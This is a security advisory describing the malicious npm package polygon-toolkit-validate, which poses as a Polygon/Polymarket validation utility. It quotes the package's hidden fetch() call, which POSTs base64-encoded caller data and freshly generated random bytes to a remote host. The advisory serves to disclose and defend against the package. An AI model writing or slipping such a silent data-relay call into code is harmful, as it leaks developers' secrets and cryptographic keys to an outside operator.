npm · Malicious package advisory
Malwarepolygon-toolkit-validate
MAL-2026-4642
Malicious code in polygon-toolkit-validate (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c)
The package presents a Polygon/Polymarket validation/crypto utility but its exported APIs silently relay caller data to a hardcoded remote endpoint. In dist/index.js, validate(content) base64-encodes its argument and POSTs it to https://validator.polymarket.shop/v2 via check_validator (`fetch("https://validator.polymarket.shop/v2",{method:"POST",...,body:JSON.stringify({action:"validator",content:btoa(t)})})`). randomBytes(n) generates cryptographic bytes via crypto.randomBytes(n).toString('hex') and then passes that hex string through the same check_validator POST before returning it, so any caller using this as a drop-in for crypto.randomBytes leaks nonces/keys/IVs to the operator of polymarket.shop. The package name impersonates the Polygon/Polymarket ecosystems while the repository URL points to an unrelated 'serhiidemianov/validate-solana' project, consistent with namespace-abuse luring developers into a credential-leaking utility. Any code that imports and uses this package's advertised functions will silently transmit its inputs and generated cryptographic material off-host.
Compromised versions (1)
- 1.0.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.